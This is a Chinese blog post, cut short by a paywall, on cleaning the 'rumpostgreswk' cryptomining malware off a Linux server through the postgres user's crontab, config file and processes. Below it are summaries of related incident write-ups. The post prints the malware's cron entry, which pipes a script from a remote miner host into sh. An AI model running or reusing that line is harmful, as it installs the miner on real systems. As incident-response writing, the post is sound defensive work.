消灭Linux挖矿病毒rumpostgreswk

最新推荐文章于 2023-05-26 11:32:07 发布
最新推荐文章于 2023-05-26 11:32:07 发布
阅读量3.5k 收藏 12
点赞数 4
分类专栏: linux 文章标签: linux postgresql centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42158942/article/details/119772773
版权

病毒定时任务

查看定时任务
sudo crontab -u postgres -l

[root@master ~]# sudo crontab -u postgres -l
*/30 * * * * /home/postgres//home/postgres/data/./oka
* */6 * * * wget -q -O- http://xmr.linux1213.ru:2019/back.sh | sh

删除postgres用户的定时任务
sudo crontab -u postgres -r

把它的配置文件改错,把user瞎改一下保存

[root@master tmp]# ll
total 3740
-rw-r--r-- 1 postgres postgres    4998 Sep  7 12:30 config.json 【病毒配置文件】

在这里插入图片描述
杀掉进程top里占用高的病毒进程,有好几个,一个占用900%,还有3个进程260%
kill -9 pid
病毒会重启,因为现在配置文件里user不对,他cpu占用非常低了
在这里插入图片描述

清理病毒

[root@master postgres]# ps -ef|grep postgres
postgres    4951       1  0 Aug19 ?
最低0.47元/天 解锁文章
rumpostgreswk 挖矿病毒程序
qq_44122254的博客
03-16 2052
朋友说他的服务器发消息有挖矿,拍完快照,给我说练练手,这算是我第一次接触挖矿 信息提示在tmp文件夹下面,进入打开进行查看,看到了提示的挖矿病毒程序 在此,同时看一下CPU的占用情况 原来学的linux操作命令,全都还给老师了,这次又现学了一下,如何查看内存的使用情况 查看内存的使用情况 Top PID:进程的ID USER:进程所有者 PR:进程的优先级别,越小越优先被执行 NI:进程Nice值,代表这个进程的优先值 VIRT:进程占用的虚拟内存 RES:进程占用的物理内存 SHR:进程使用的共享内
postgres安装rum和pg_jieba插件
Arlo的博客
12-24 1982
云服务器安装 因为在服务器上安装有两个版本的PSQL,所以首先应该确定到底是哪个版本的PSQL在提供服务器,并将该版本的服务的命令设置为默认的命令,否则在下面安装过程中会产生错误。 [root@localhost ~]# netstat -ntlpa | grep post tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN 741/postgres tcp 0 0 127.0
rumpostgreswk 挖矿病毒程序。杀除
王帅的博客
12-11 2195
今天阿里云发短信,说服务器发现挖矿病毒程序。我们来看看。怎么回事。 发现。postgres 用户启动了一个进程文件。这个文件,占用cpu非常高。就是他了。 我们来看看,他的启动路径在哪里? 发现。tmp下。这个config 文件,有问题。并不是postgres 的程序。 ./postgres_dm /tmp/rumpostgreswk --config=/tmp/config.json 发现这两个文件。就是病毒。 找到对应的路径。在/tmp下面。 发现这个文件夹里面很多都是异..
【问题记录】postgreSQL使用默认密码导致kdevtmpfsi挖矿病毒注入
最新发布
UncleDong的博客
05-26 2249
3.分别kill 掉这两个进程,一定要两个都kill掉,刚开始处理的时候只kill了主进行,没有处理守护进程,导致一会又挖矿机器> 又启动开始工作,cpu 又跑到100%6.使用lsof查看该进程存在异常IP连接,比如:45.129.2.107,在服务器安全组中将该IP禁用,并重启服务器。7.最后,一定要重置系统上的所有用户密码,检查服务安全组,尤其是远程端口!由于该挖矿任务是个常见任务,因此网上很多教程,我参考的是。服务器不同,可能路径不同,可以直接用命令查找。,发现host被篡改,删除即可。
postgresql
wk022的专栏
09-11 430
postgresql初始用户 postgres 没有密码 通过以下命令登录 $ sudo -u postgres psql 设置密码 \password Enter password: ... ... 删除数据库 drop DATABASE ambari
xmrig挖矿病毒导致Postgresql数据库掉线
kite99的博客
04-18 1476
xmrig挖矿病毒导致Postgresql数据库断线。清除病毒数据库工作正常。
Postgres漏洞复现
qq_42133828的博客
07-21 1041
Postgres漏洞汇现 CVE-2018-1058 漏洞名称: 远程代码执行漏洞 漏洞类型: 远程代码执行 公布时间: 2018-3-1 涉及应用版本: PostgreSQL https://www.securityfocus.com/bid/103221 针对操作系统: windows/linux/mac 漏洞简介: 拥有普通权限的psql用户可以创建恶意函数。在管理员使用某些工具的时候,就会...
记录一次linux服务器被挖矿的解决
qq_32394351的博客
05-26 3654
闲来登录了一下腾讯云控制台,发现资源监控面板服务器的cpu利用率一直100%以上,甚至达到了130% 反常必有妖,毕竟我服务器除了挂了个docker几乎是没开其他应用的,一定有异常程序在作怪。 进入服务器,输入 top -c 发现有一个程序就占用100%以上的cpu,后面对应的command是: /tmp/kdevtmpfsi 百度去查了一下,发现这是一个挖矿程序,好家伙,原来服务器两个月前就被置入挖矿了。 那时候我做了什么?无非是拉取了别人的几个docker镜像,难不成docker镜像里投.
Postgresql RUM索引
魂醉的一亩二分地
03-04 1377
RUM 为了全文搜索更加快,RUM索引可以看做是在GIN基础上的扩展。可以从https://github.com/postgrespro/rum下载使用。 使用GIN索引的一些限制 GIN索引允许使用tsvector和tsquery类型执行快速的全文本搜索。但是,使用GIN索引进行全文搜索存在几个问题: 排序慢。需要有关词汇的位置信息才能进行排序。 GIN索引不存储词素的位置信息。因此,在索引扫...
记一次公网postgresql数据库服务器被入侵为矿机的定位过程
萝卜吃鱼914的博客
09-26 2984
今天中午群里有一个群友反馈pg服务器cpu使用率高达1700%,处于好奇自己就帮着他一起定位了一下问题,以下记录一下定位问题的过程方便以后做复盘管理! 现象截图如下: 一、查看cpu情况和服务器平均负载情况得知各个cpu的使用率并不是很高呀,为什么执行top命令看到postgresql进程的cpu使用是1700%呢?没有头绪我们继续往下看 二、查看一下服务器的负载情况呢 有问题了,你服务...
一个名为systemd-init的CPU挖矿病毒及后续
weweeeeeeee的博客
11-11 2633
一个名为systemd-init的CPU挖矿病毒及后续 作者root在安全 今天接到了报警,一台内部的服务器CPU负载嗷嗷的高,感到非常的疑惑,就点进去看看负载情况 CPU爆满 监控诚不欺我,果然是CPU跑爆了,然后看看Command,发现都是M开头的,这肯定就是病毒了,就开始处理 发现运行最长的进程PID是32336,就拿它下刀开始查 发现,毛都查不到,就开始按照...
Postgres数据库之增加dm默认表空间main学习汇总
qq_40310161的博客
05-20 471
Postgres数据库之增加dm默认表空间main学习汇总背景表空间概述 学习参考书籍、网站或博文: 参考书籍:《PostgreSQL数据库内核分析》 PostgreSQL系统目录 官方文档,点击前往 背景 近期接触的项目需要在Postgres数据库上增加dm默认表空间main,因此在此做以学习总结。 先来看看dm数据库上查询的结果: Postgres数据库的默认表空间有哪些? 表空间概述 ...
分析黑客入侵 PostgreSQL 数据库
一叶的专栏
07-06 2348
问题分析 前几天,由于开发需要,我在 AWS EC2 部署了一个 PostgreSQL 数据库服务,本来想着过几天用完就终止服务,因此放松了警惕,数据库服务的所有配置保持默认配置,包括账号密码以及端口。然而,今天连接数据库时,出现了如下异常: FATAL: pg_hba.conf rejects connection for host "xx.xx.xx.xx", user "postgres",...
基于Linux平台下的僵尸网络病毒《比尔盖茨》
热门推荐
星焱宖
06-11 2万+
文章分析了近来的 比尔盖茨 病毒,这是一种网络僵尸病毒,它的破坏方式很巧妙也很多样,作者的能力有限,希望与大家共同探讨。
利用PostgreSQL配置不当漏洞实现
whatiwhere的博客
11-25 1990
实验目的 本节学习利用PostgreSQL配置不当漏洞实现以下操作: 利用PostgreSQL读取服务器磁盘文件 利用PostgreSQL向服务器磁盘写文件 实验工具 Navicat Premium 是一款目前互联网上最好用的可多重连接的数据库管理工具,也是navicat premium软件推出的最新版本,能够支持单一程序同时连接到MySQL、MariaDB、SQL Server、SQLite...
CocosCreator游戏开发:消灭病毒源码解析
标题“CocosCreator消灭病毒源码”中隐含的知识点非常丰富,因为从标题上我们可以推断出一系列与CocosCreator开发相关的信息,同时也可以从描述和标签中挖掘到更多细节。以下是基于所给文件信息的知识点梳理: 1. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值